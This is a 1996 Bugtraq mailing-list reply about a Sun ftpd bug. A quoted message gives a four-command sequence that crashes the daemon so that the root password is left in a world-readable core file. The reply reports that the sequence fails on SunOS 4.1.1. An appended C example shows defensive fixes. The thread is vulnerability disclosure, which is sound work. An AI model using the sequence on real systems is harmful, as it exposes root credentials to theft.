[3475] in bugtraq


Re: ftpd bug? Was: bin/1805: Bug in ftpd

daemon@ATHENA.MIT.EDU (gamble@dxcoms.cern.ch)
Wed Oct 16 13:28:04 1996

Date: 	Wed, 16 Oct 1996 10:04:28 +0200
Reply-To: gamble@dxcoms.cern.ch
From: gamble@dxcoms.cern.ch
X-To:         Martin.Rex@sap-ag.de
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To:  Your message of "Tue, 15 Oct 96 18:14:08 EDT."
              <199610152314.AA21264@sap-ag.de>

Doesn't work for me ... SunOS 4.1.1

SOMEWHERE>ftp sunos
220 sunos FTP server (SunOS 4.1) ready.
Connected to sunos.xxx.xx.
Name (sunos:smith):
331 Password required for smith.
Password:
230 User smith logged in.
FTP> cd /tmp
250 CWD command successful.
FTP> user root fred
530 User root access denied.
%FTP-E-LOGREJ, Login request rejected
FTP> quote pasv
421 Service not available, Remote server has closed the connection
SOMEWHERE>

and no core in /tmp

John
------------------------------------------ original message


James Poland 6-5251 wrote:
>
> On Solaris 2.5.1, the core file contains only the user's password in
> cleartext. How hard is it to crash someone else's ftp session?

Killing from the command line doesn't seem to work, but:

SunOS 5.5:

logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

voila, root password in world readable core dump under /tmp

-Martin

PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
    so they seem to have used the proposed fix

         Checking for "pw != NULL"

    So this proposal was simple and obvious   ... and incomplete. :)
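
An added defensive example, not part of the thread and not taken from any ftpd source: two generic measures that keep a rejected login's password out of a core file regardless of which command later crashes the daemon. The names `session`, `login`, `scrub`, `disable_core_dumps` and `core_dumps_disabled` are hypothetical, and the credential check is a constructed stand-in.

```c
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>

/* Hypothetical per-connection state; the field names are assumptions. */
struct session { char pass[64]; int authed; };

/* Set soft and hard RLIMIT_CORE to 0 so a crash writes no core file. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Returns 1 when both core limits are 0, 0 otherwise. */
int core_dumps_disabled(void)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_CORE, &rl) != 0) return 0;
    return rl.rlim_cur == 0 && rl.rlim_max == 0;
}

/* Zero a secret through a volatile pointer so the stores are not optimized away. */
void scrub(void *buf, size_t len)
{
    volatile unsigned char *p = buf;
    while (len--) *p++ = 0;
}

/* Constructed stand-in for the USER/PASS step. `expected` replaces the real
 * password-database check, which would compare hashes, not cleartext. */
int login(struct session *s, const char *pass, const char *expected)
{
    strncpy(s->pass, pass, sizeof s->pass - 1);
    s->pass[sizeof s->pass - 1] = '\0';
    s->authed = (strcmp(s->pass, expected) == 0);
    scrub(s->pass, sizeof s->pass);  /* accepted or rejected, keep no copy */
    return s->authed;
}

int main(void)
{
    struct session s;
    disable_core_dumps();
    printf("core dumps disabled: %d\n", core_dumps_disabled());
    printf("login accepted: %d\n", login(&s, "wrongpasswd", "constructed-secret"));
    return 0;
}
```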
